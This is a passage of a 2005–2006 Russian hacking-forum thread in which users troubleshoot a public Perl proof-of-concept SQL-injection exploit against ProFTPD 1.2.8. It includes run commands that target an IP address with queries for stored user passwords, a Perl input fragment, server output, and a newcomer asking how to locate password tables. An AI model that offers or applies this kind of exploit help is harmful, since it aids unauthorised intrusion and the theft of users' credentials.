ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > С/С++, C#, Delphi, .NET, Asm
Перезагрузить страницу sql в ProFTPD
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 20.04.2005, 13:04
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию
Цитата:
Сообщение от nerezus  
Как же это ты так смог? =)
юзай так:
perl script.pl server query
вот так и пушу :
Код:
C:\perl\bin>perl.exe 1.pl 207.248.240.118 SELECT user_password FROM forum_users;

Proof Of Concept Sql Inject on ProFTPD
Usage: perl poc-sqlftp <target> [1=Alternate query]


C:\perl\bin>
.........

зы ip изменён
 
Ответить с цитированием

  #12  
Старый 20.04.2005, 14:17
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию
начни так:

#!/usr/bin/perl
use IO::Socket;
print "\nInput your IP: ";
my $server = <stdin>;
chop ($server);
print "\nInput your query: ";
my $query = <stdin>;
chop ($query);


и в середине замени print "Sent query to $ARGV[0]\n"; на print "Sent query to $server\n";
Последний раз редактировалось nerezus; 20.04.2005 в 14:20..
 
Ответить с цитированием

  #13  
Старый 20.04.2005, 19:49
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию
хорошо к серверу он уже конектится

Код:
C:\perl\bin>2.pl

Input your IP: 207.248.240.118

Input your query: SELECT user_password FROM phpbb_users
220 ProFTPD 1.2.8 Server (NewAge FTP Server) [serv.ru]
331 Password required for ')UNION.
530 Login incorrect.
Sent query to  207.248.240.118
[------- Sql Inject Unable
Наверно запрос у меня не правельный ?
или дыру каким то макаром прикрыли
 
Ответить с цитированием

  #14  
Старый 20.04.2005, 21:05
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию
>или дыру каким то макаром прикрыли
если учитывать возраст сплоита
Последний раз редактировалось nerezus; 20.04.2005 в 21:09..
 
Ответить с цитированием

  #15  
Старый 20.04.2005, 21:29
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию
лан спасибо запомощь!, буду подругому ковырять
 
Ответить с цитированием

  #16  
Старый 12.05.2005, 12:17
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
Цитата:
Сообщение от Майор  
вот так и пушу :
Код:
C:\perl\bin>perl.exe 1.pl 207.248.240.118 SELECT user_password FROM forum_users;

Proof Of Concept Sql Inject on ProFTPD
Usage: perl poc-sqlftp <target> [1=Alternate query]


C:\perl\bin>
.........

зы ip изменён
вот когда так пишет т.е. скрипт не запускается это означает что не все или неправильный параметры передал ты скрипту.А так если анейбл то значит дырки нету =)))
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #17  
Старый 12.07.2006, 21:32
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию
А не подскажете что писать в query ?
 
Ответить с цитированием

  #18  
Старый 12.07.2006, 22:29
zeppe1in
Постоянный
Регистрация: 12.07.2006
Сообщений: 327
Провел на форуме:
1654818

Репутация: 117
По умолчанию
Цитата:
Сообщение от Майор  
вот так и пушу :
Код:
C:\perl\bin>perl.exe 1.pl 207.248.240.118 SELECT user_password FROM forum_users;

Proof Of Concept Sql Inject on ProFTPD
Usage: perl poc-sqlftp <target> [1=Alternate query]


C:\perl\bin>
так ты передаёш скрипту не два, а пять параметров. Запрос надо в кавычки.
 
Ответить с цитированием

  #19  
Старый 12.07.2006, 22:55
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию
уууууууу.... охренологи(археологи)... )) тему подняли полуторолетнюю ))
 
Ответить с цитированием

  #20  
Старый 12.07.2006, 23:20
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию
Ну дык Интересно ))) Я вот некоторые нюансы не понимаю, а объяснить некому(((

Например: ччто именно я должен вводит в query при использование эксплоита :?

как узнать в какой категории (название) хранится пароль, или логинн пользователя ?
Последний раз редактировалось ПсиХ; 13.07.2006 в 21:18..
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ